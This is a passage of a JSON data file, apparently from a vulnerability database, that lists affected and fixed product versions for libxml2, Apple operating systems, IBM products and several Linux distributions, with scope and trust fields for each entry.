"scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "1.7.2" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.6" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.211" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.0.1" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.50" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.13" }, { "model": "connections docs", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.2.6" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.1" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.32" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.0.1" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.410" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.1" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "1.7.3" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.4" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.24" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.14" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.1.3" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.9" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.3" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.219" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.1.0" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.0.1" }, { "model": "powerkvm sp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.10" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.4" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.2" }, { "model": "powerkvm build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.165.6" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "1.7.1" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.25" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.22" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.30" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.3.12" }, { "model": "ios", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "9.3" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "1.8.6" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.1.1" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.3.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.1" }, { "model": "powerkvm build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.157" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.5.0" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "1.0.1" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.18" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.44" }, { "model": "connections docs", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.1" }, { "model": "watchos", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "2.2" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "1.7" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.2.2" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.3" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.28" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.9" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "sametime media server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.14" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.24" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.7" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.2.4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "connections docs ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.6003" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.1.1" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.42" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "connections docs ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.0002" }, { "model": "rational systems tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.3.0.3" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.6" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.3.6" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "30" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8" }, { "model": "watch", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "0" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.5.8" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.16" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.29" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.3" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.7.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.0.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.7" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.08" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "1.8.16" }, { "model": "rational systems tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.3.0.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.3" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.4" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.2.10" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.3.14" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.21" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.2.7" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.25" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.08" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "1.8.1" }, { "model": "ios beta", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.1.1" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.5.4" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.3" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "1.8.4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.1" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.213" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.0" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.2.3" }, { "model": "rational systems tester interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.3.0.7" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "smartcloud entry fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.413" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.1" }, { "model": "smartcloud entry appliance fixpac", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3.5" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.28" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.3" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.0.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.6" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "50" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.3.5" }, { "model": "powerkvm build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.12" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.8" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.32" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.1" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.26" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.5.1" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.34" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.10" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.3.4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.1" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.26" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.18" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.0" }, { "model": "smartcloud entry fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.412" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1.1" }, { "model": "tvos", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "9.2" }, { "model": "ios for developer", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.7.6" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0.1" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.17" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.0.0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.21" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.22" }, { "model": "connections docs", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.4" }, { "model": "watchos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.31" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.3.0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.218" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.0.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "3.2.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.5.10" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.411" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.13" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "1.8.7" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.5" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.2.8" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.2" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.7.4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.3" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.7" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.9" }, { "model": "enterprise linux hpc node optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.11.4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.20" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.21" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.214" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "1.8.14" }, { "model": "libxml2", "scope": "ne", "trust": 0.3, "vendor": "xmlsoft", "version": "2.9.3" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.2.5" }, { "model": "smartcloud entry fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.19" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "1.8.9" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.2" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "rational systems tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.3.0.1" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "smartcloud entry appliance fixpac", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "rational systems tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.3.0.7" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.5" }, { "model": "ios beta", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "64" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.113" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.1" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.5.7" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.4" }, { "model": "tvos", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.1.1" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.11" }, { "model": "enterprise linux workstation optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "1.8.5" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.1.3" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.110" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "1.8.10" }, { "model": "connections docs ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.7006" }, { "model": "smartcloud entry fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.110" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.1" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.30" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.23" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.21" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.2.1" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "1.8.3" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "tv", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.3.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.1.2" }, { "model": "connections docs", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.29" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "mac os security update", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x2016-0020" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.22" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.6" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.11" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.7.8" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.31" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.1" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.4" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.27" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.5" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.7.1" }, { "model": "smartcloud entry fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.415" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.1.1" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.11" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.4" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.27" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.09" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.6" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.2" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.7.3" }, { "model": "ipad", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "0" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.3.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.4.19" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.7.5" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3.4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.1.6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.3" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.3" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.6.24" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.5" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.01" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.5" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "1.8.13" }, { "model": "libxml2", "scope": "eq", "trust": 0.3, "vendor": "xmlsoft", "version": "2.2.9" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.8" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": 